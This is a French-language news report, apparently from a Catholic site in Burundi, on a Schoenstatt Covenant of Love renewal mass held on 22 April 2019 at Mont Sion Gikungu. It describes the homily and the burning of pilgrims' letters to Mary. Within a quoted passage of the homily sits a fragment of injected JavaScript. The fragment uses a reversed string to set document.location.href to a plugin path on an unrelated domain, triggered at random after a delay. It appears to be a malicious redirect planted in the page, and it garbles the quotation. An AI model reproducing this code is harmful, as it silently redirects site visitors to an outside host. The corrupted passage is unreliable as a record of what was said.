Le lundi 22avril 2019, les schoenstattiens et d’autres fidèles ont renouvelé l’Alliance d’Amour scellée avec la MTA, dans une célébration eucharistique qui a débuté 17heures au Mont Sion Gikungu.
Quelques dix minutes avant que commence la messe, tombent l’averse, c’est la cause qui fait que soit changé le lieu de célébration. Non pas dans le Sanctuaire comme à l’accoutumée pour les célébrations du 18, mais dans l’Eglise de la Sainte Trinité.
Accompagné par le Père Longin NTIRANYIBAGIRA comme concélébrant, le Père-Recteur du Sanctuaire Félicien NIMBONA a présidé cette eucharistie. « Tout ce que nous faisons, c’est parce que Jésus est ressuscité et voilà la bonne nouvelle. Nous sommes venus renouveler notre alliance d’amour faite avec la Mère de Dieu, parce que le Christ est vivant. Marie est lui aussi dans la joie, ainsi a-t-il introduit.
Homélie
« Permettez-moi de me résumer en se basant sur les témoignages de ceux qui nous ont devancés dans la foi, dit-il. Ils nous ont raconté ce qu’ils ont vu de leurs propres yeux, ce qu’ils ont entendu de leurs oreilles, ce qu’ils ont palpé de leurs propres mains. Notre foi se base sur celui des apôtres qui ont été avec Jésus et ont tout vu. Nous rassemblons chaque fois le 18 du mois ; le Jésus que nous atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorions a pris chair dans les entrailles de la très Sainte Vierge. »
Le célébrant a parlé de cette coïncidence du renouvellement de l’alliance pendant la période pascale : « Nous célébrons le dix-huit en méditant aussi sur la résurrection de notre sauveur. » Selon lui, le renouvellement de l’alliance rappelle le OUI du baptême, et c’est l’occasion aussi de revoir où l’on est avec l’accomplissement des engagements baptismaux.
Pour terminer son instruction il a évoqué ce mélange de la joie pascale et celle du Jubilé du Sanctuaire avec le devise suivant : « Le Puissant fit pour moi des merveilles, saint est son nom. « Que la MTA puisse nous aider à ouvrir nous cœurs à la miséricorde du Christ vivant. »
Il a invité alors les participants à se rendre sur le lieu des cérémonies du jour, but ultime de la célébration. Devant l’Eglise, le Prêtre a mis au feu toutes les texto et lettres adressés à Marie par les pèlerins tout au long du mois, un des moyens de contribution au capital de grâces.
Signalons que le renouvellement de l’alliance se fait chaque dix-huit du mois, mais ce mois-ci, cette date est arrivée le jeudi saint, et on a dû reporter pour le 22avril.
Brigitte IRAKOZE